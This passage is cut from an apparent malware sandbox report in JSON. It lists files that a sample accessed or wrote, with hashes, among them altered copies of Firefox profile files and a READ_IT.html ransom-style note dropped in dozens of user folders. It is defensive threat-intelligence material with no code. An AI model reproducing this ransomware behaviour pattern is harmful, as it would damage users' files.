}, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Cookies\\index.dat.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\cookies\\index.dat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Cookies\\index.dat", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\cookies\\index.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\_CACHE_CLEAN_.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\_cache_clean_.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\_CACHE_CLEAN_", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\_cache_clean_", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\ab68b23ba499a12eeb8774a7c0b258f3.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\ab68b23ba499a12eeb8774a7c0b258f3.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\ab68b23ba499a12eeb8774a7c0b258f3.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\ab68b23ba499a12eeb8774a7c0b258f3.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\cda93a6bd681b5f6eaf29ea686e2b6f1.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\cda93a6bd681b5f6eaf29ea686e2b6f1.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\cda93a6bd681b5f6eaf29ea686e2b6f1.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\cda93a6bd681b5f6eaf29ea686e2b6f1.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\startupCache\\startupCache.4.little.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\startupcache\\startupcache.4.little.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\startupCache\\startupCache.4.little", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\startupcache\\startupcache.4.little", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.cache.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.cache.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.cache", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.cache", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.pset.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.pset.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.pset", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.pset", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.sbstore.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.sbstore.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.sbstore", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-malware-shavar.sbstore", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.cache.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.cache.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.cache", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.cache", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.pset.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.pset.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.pset", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.pset", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\{846ee340-7039-11de-9d20-806e6f6e6963}", "hashes": [ { "md5_hash": "755f5c8f81c8cd181f27d7b5dbcd37f7", "sha1_hash": "619f68e3ee28c77522018ed6af5c877130464020", "sha256_hash": "fae73bded7d5ab96ea321b7a17a31d5816ae67bbbc8c37c3e370a1ef44242d1c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\{846ee340-7039-11de-9d20-806e6f6e6963}", "operations": [ "write", "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "System Paging File", "hashes": [], "norm_filename": "system paging file", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\UrNkmksgAz1mrC-KZEW\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Searches\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Saved Games\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\saved games\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Windows Live\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\MSN Websites\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Microsoft Websites\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Favorites\\Links\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Downloads\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\downloads\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Outlook Files\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\outlook files\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\_private\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\_private\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\READ_IT.html", "hashes": [ { "md5_hash": 